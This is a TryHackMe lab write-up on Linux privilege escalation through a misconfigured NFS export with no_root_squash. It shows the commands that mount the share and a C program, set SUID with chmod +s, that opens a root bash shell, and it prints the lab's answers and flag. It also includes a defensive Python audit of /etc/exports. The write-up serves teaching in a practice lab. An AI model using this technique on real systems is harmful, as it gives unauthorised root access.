TryHackMe - Linux Privilege Escalation: NFS

This article discusses the solution for TryHackMe's Linux Privilege Escalation SUID task, so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Privilege Escalation: NFS (Network File Sharing) Solution

Notes:

  • SSH and Telnet can be used for root access.

    • An SSH private key found on the target system can be used to connect with root privileges.
  • Misconfigured network shell.

    • Can be present when a network backup exists.
  • NFS configuration is in /etc/exports.

    • Look for no_root_squash on a writable share, as it allows creating an executable with the SUID bit set and executing it on the target system.

      • By default, NFS removes root privileges from any file by changing the root user to nfsnobody.

How many mountable shares can you identify on the target system?

  1. Run the following command on the attack machine:

     showmount -e {target_machine ip}
    


Answer: 3

How many shares have the "no_root_squash" option enabled?

  1. Run cat /etc/exports on the target machine


Answer: 3
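
A defensive counterpart to the manual check above, as an added example that is not part of the original write-up: a small Python audit that parses /etc/exports syntax and reports every client exported with no_root_squash. The sample file, the function names and the "high"/"review" labels are assumptions of this example, and quoted paths containing spaces are not handled.

```python
import re

# Constructed sample in /etc/exports syntax; paths and addresses are made up.
SAMPLE_EXPORTS = r"""
# constructed sample
/srv/backups   *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/public    *(ro,sync,no_root_squash)
/srv/projects  192.0.2.0/24(rw,sync,root_squash) \
               198.51.100.7(rw,no_root_squash)
/srv/scratch   -rw,sync 192.0.2.10 192.0.2.11(ro)
"""

CLIENT_RE = re.compile(r"^([^()]*)(?:\(([^()]*)\))?$")

def parse_exports(text):
    """Yield (path, client, options) for each client on each export line."""
    text = text.replace("\\\n", " ")              # join continued lines
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()    # drop comments
        if len(fields) < 2:
            continue
        path, defaults = fields[0], []
        for field in fields[1:]:
            if field.startswith("-"):             # "-opt,opt" sets line defaults
                defaults = field[1:].split(",")
                continue
            match = CLIENT_RE.match(field)
            if not match:
                continue
            own = [o for o in (match.group(2) or "").split(",") if o]
            yield path, match.group(1) or "*", defaults + own

def audit(text):
    """Return (path, client, severity) for exports that keep client root as root."""
    findings = []
    for path, client, options in parse_exports(text):
        writable, squash_root = False, True       # NFS defaults: ro, root_squash
        for opt in options:                       # later options win
            if opt in ("rw", "ro"):
                writable = opt == "rw"
            elif opt in ("root_squash", "no_root_squash"):
                squash_root = opt == "root_squash"
        if not squash_root:
            findings.append((path, client, "high" if writable else "review"))
    return findings

if __name__ == "__main__":
    for path, client, severity in audit(SAMPLE_EXPORTS):
        print(f"{severity:6} {path} -> {client}")
```

On a real server, pass the contents of /etc/exports to audit() instead of the sample; "high" marks the writable no_root_squash case the notes warn about.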

What is the content of the flag7.txt file?

  1. Let's mount one of the mountable shares by executing the following on the attack machine:

     mkdir /tmp/backupsharemounted
     mount -o rw 10.10.139.175:/home/ubuntu/sharedfolder /tmp/backupsharemounted
     cd /tmp/backupsharemounted
     touch attack.c

  2. Let's update attack.c, on the attack machine, so that it executes /bin/bash.

     #include <stdlib.h>   /* system() */
     #include <unistd.h>   /* setgid(), setuid() */

     int main()
     {
         setgid(0);             /* set group ID to root */
         setuid(0);             /* set user ID to root */
         system("/bin/bash");   /* start a shell */
         return 0;
     }

  3. Execute the following on the attack machine:

     gcc attack.c -o attack -w
     chmod +s attack

  4. On the target machine, cd to /home/ubuntu/sharedfolder and you will see the attack executable file.

  5. Execute ./attack on the target machine and this will provide us with a root bash shell.

  6. Run cat /home/matt/flag7.txt on the target machine

Answer: THM-89384012

Until next time. Keep learning.

Stay stoked and code. :)


I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)